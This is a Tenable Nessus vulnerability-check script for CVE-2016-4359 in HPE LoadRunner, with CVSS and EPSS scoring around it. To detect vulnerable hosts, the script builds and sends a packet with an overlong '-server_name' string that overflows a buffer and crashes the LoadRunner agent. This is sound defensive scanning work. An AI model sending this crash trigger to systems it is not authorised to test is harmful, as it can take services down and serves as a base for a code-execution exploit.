CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
97.1%
The Hewlett Packard Enterprise (HPE) LoadRunner application running on the remote host is affected by a stack-based buffer overflow condition in mchan.dll, when constructing a shared memory file name, due to improper validation of the size of a user-supplied string. An unauthenticated, remote attacker can exploit this, via a long ‘-server_name’ value, to execute arbitrary code with the privileges of the user running the application.
Note that LoadRunner reportedly is affected by other vulnerabilities, which can result in a denial of service; however, Nessus has not tested for these.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(91972);
script_version("1.11");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");
script_cve_id("CVE-2016-4359");
script_xref(name:"ZDI", value:"ZDI-16-363");
script_xref(name:"HP", value:"HPSBGN03609");
script_xref(name:"HP", value:"PSRT110020");
script_xref(name:"HP", value:"emr_na-c05157423");
script_xref(name:"TRA", value:"TRA-2016-16");
script_name(english:"HPE LoadRunner Shared Memory Name Construction RCE");
script_set_attribute(attribute:"synopsis", value:
"A software performance testing application running on the remote host
is affected by a remote code execution vulnerability.");
script_set_attribute(attribute:"description", value:
"The Hewlett Packard Enterprise (HPE) LoadRunner application running
on the remote host is affected by a stack-based buffer overflow
condition in mchan.dll, when constructing a shared memory file name,
due to improper validation of the size of a user-supplied string. An
unauthenticated, remote attacker can exploit this, via a long
'-server_name' value, to execute arbitrary code with the privileges of
the user running the application.
Note that LoadRunner reportedly is affected by other vulnerabilities,
which can result in a denial of service; however, Nessus has not
tested for these.");
# https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-c05157423
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?1dac9898");
script_set_attribute(attribute:"solution", value:
"Apply the appropriate patch or upgrade according to the vendor
advisory.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2016-4359");
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"vuln_publication_date", value:"2016/06/01");
script_set_attribute(attribute:"patch_publication_date", value:"2016/05/31");
script_set_attribute(attribute:"plugin_publication_date", value:"2016/07/07");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:hp:loadrunner");
script_set_attribute(attribute:"thorough_tests", value:"true");
script_end_attributes();
script_category(ACT_DENIAL);
script_family(english:"Gain a shell remotely");
script_copyright(english:"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("loadrunner_agent_detect.nasl", "os_fingerprint.nasl");
script_require_ports("Services/loadrunner_agent", 54345);
exit(0);
}
include('audit.inc');
include('byte_func.inc');
include('global_settings.inc');
include('misc_func.inc');
include('dump.inc');
function mkdword_be()
{
local_var v;
v = _FCT_ANON_ARGS[0];
return mkdword(v, order: BYTE_ORDER_BIG_ENDIAN);
}
function block(data, len, inclusive)
{
if(isnull(len))
{
len = strlen(data);
if(inclusive)
len += 4;
}
return (mkdword_be(len) + data);
}
function xdr_string(s, len)
{
# Allow user to generate a malformed xdr_string
if(! isnull(len))
return block(data:s, len:len);
s = block(data:s);
# pad to 4 byte boundary
s += crap(data:'\x00', length: (4 - strlen(s) % 4) % 4);
return s;
}
#
# MAIN
#
# It looks like only the Windows version is affected.
# If OS cannot be determined, proceed with the attack.
os = get_kb_item('Host/OS');
if (os && 'Windows' >!< os)
audit(AUDIT_OS_NOT, 'Windows');
# Make sure LoadRunner agent is detected
port = get_service(svc:'loadrunner_agent', exit_on_fail:TRUE);
# Attack is known to work on ENCAPS_IP, may also work on SSL.
soc = open_sock_tcp(port, transport: ENCAPS_IP);
if (!soc) audit(AUDIT_SOCK_FAIL, port, 'TCP');
#
# Build the attack request
#
guid = base64(str:rand_str(length:16));
blk1 = block(data: guid +"0");
# Message header
hdr = mkdword_be(0x0d) +
mkdword_be(0x01) +
crap(data:'X',length:16) +
mkdword_be(0x00);
# Max size: 0x400 bytes
conn_str = "(-server_type=2)" +
"(-server_name=" + crap(data:'A', length:0x380) + ")";
# Message body
body = mkdword_be(0x06)+
xdr_string(s:conn_str) +
mkdword_be(0x7530);
hdr = block(data:hdr, inclusive: TRUE);
body = block(data:body, inclusive: TRUE);
msg = block(data:hdr + body);
req = blk1 + msg;
send(socket:soc, data:req);
# Do not close socket right after the send.
# Doing so can prevent the remote service from
# processing the attack packet.
res = recv(socket:soc, length:4096);
close(soc);
# Windows Error Report can pop up and the Agent process/service is
# not totally dead. It still can accept TCP connections.
# We try to run the LR agent protocol to get something back.
# A vulnerable service will not respond while a patched one will.
res = NULL;
soc = open_sock_tcp(port, transport: ENCAPS_IP);
if (soc)
{
pid = rand() % 0xffff;
tid = rand() % 0xffff;
server_name = "nessus";
server_ip = compat::this_host();
server_port = get_source_port(soc);
conn_str = "(-server_type=8)" +
"(-server_name=" + server_name + ")" +
"(-server_full_name=" + server_name + ")" +
"(-server_ip_name=" + server_ip + ")" +
"(-server_port=" + server_port + ")" +
"(-server_fd_secondary=4)" +
"(-guid_identifier=" + guid + ")";
body = mkdword_be(0x0f)+
xdr_string(s: server_name + ";" + pid + ";" + tid) +
xdr_string(s:conn_str) +
mkdword_be(0x7530) +
mkdword_be(0x8);
body = block(data:body, inclusive: TRUE);
msg = block(data:hdr + body);
req2 = blk1 + msg;
send(socket:soc, data:req2);
res = recv(socket:soc, length:4096);
close(soc);
}
if(res)
{
audit(AUDIT_LISTEN_NOT_VULN, 'HP LoadRunner Agent', port);
}
# Failed to connect or get a response
else
{
security_report_v4(
port: port,
severity: SECURITY_HOLE,
generic: TRUE,
request: make_list(hexdump(ddata:req))
);
}
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
97.1%